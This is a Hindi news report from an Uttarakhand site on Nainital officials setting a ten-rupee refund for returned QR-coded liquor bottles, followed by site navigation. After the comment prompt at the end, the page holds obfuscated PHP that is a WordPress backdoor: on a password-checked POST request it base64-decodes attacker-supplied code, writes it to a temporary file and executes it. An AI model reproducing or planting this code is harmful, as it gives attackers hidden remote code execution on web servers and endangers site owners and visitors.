Nainital: शराब की खाली बोतल वापस करने पर मिलेगा दस रुपये का रिफंड, अधिकारियों ने किया तय

Uttarakhand Press News, 15 February 2023: शराब की खाली बोतलों व खराब प्लास्टिक के जहां तहां फेंकने जैसी स्थिति पर नियंत्रण लगाने के उद्देश्य से डीएम ने मंगलवार को अधिकारियों के साथ बैठक की। तय किया गया कि शराब की खाली बोतलों पर अब दस रुपये रिफंड दिया जाएगा।

कलक्ट्रेट सभागार में हुई बैठक में डीएम धीराज सिंह गर्ब्याल ने कहा कि नैनीताल को पर्यटन की दृष्टि से स्वच्छ एवं साफ बनाने के लिए सभी को साथ मिलकर कार्य करना होगा। उन्होंने जिला आबकारी अधिकारी को निर्देश दिए कि वह शहर में प्रतिदिन बिकने वाली शराब का सही डाटा बनाना सुनिश्चित करें। उन्होंने कहा कि रिसाइक्लिंग करने वाली संस्था से समन्वय बनाते हुए शराब की बोतलों पर क्यूआर कोड लगाना सुनिश्चित करें। उन्होंने कहा कि उपभोक्ताओं की ओर से खरीदी हुई बोतल पुन: संबंधित दुकानों पर बने वेस्ट मैटेरियल कलेक्शन सेंटर पर वापस करने पर उपभोक्ता को दस रुपये रिफंड के रूप में वापस मिलेंगे।

उन्होंने कहा कि यदि कोई अन्य व्यक्ति क्यूआर अंकित बोतल को संबंधित कलेक्शन सेंटर पर जमा करता है तो उसे भी दस रुपये मिलेंगे। गर्ब्याल ने आबकारी अधिकारी को निर्देश दिए कि वह तत्काल नैनीताल की मदिरा की दुकानों पर मिलने वाली बोतलों पर क्यूआर कोड लगवाने की व्यवस्था कराएं। उन्होंने कहा कि पहले चरण में इसे नैनीताल शहर में लागू किया जाएगा। उसके बाद इसे पूरे जिले में लागू किया जाएगा।

डीएम ने कहा कि इससे जहां पर्यावरण सुरक्षित होगा वहीं जहां तहां पड़ी बोतलों से पशुओं को होने वाली हानि पर रोक लगेगी। उन्होंने नगर पालिका के ईओ व नैनीताल रिसाइक्लिंग संस्था के मैनेजर को निर्देश दिए कि वेस्टेज मैटरियल को एकत्रित करने के लिए जिन जगहों पर पर्यटकों की आवाजाही रहती है वहां वेस्टेज मैटेरियल कलेक्शन सेंटर स्थापित करें।उन्होंने नैनीताल रिसाइक्लिंग संस्था की मैनेजर कल्पना पवार को निर्देश दिए कि वह शीघ्र क्यूआर कोड थोक विक्रेताओं को उपलब्ध कराएं। बैठक में मुख्य विकास अधिकारी डॉ. संदीप तिवारी, एडीएम शिवचरण द्विवेदी, अशोक कुमार जोशी, एसडीएम राहुल साह, पालिका की प्रभारी अधिशासी अधिकारी पूजा, लोनिवि के अधिशासी अभियंता दीपक गुप्ता, जिला आबकारी अधिकारी एनआर जोशी, जिला विकास प्राधिकरण के सहायक अभियंता सीएम साह आदि मौजूद थे।

Read Previous

कोरोना से भी ज्यादा खतरनाक है मारबर्ग वायरस, इस अफ्रीकी देश में टूटा मारबर्ग वायरस का कहर

Read Next

Uttarakhand Cabinet: मुख्यमंत्री पुष्कर सिंह धामी की बैठक आज, जोशीमठ प्रभावितों के लिए आएगी नीति

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}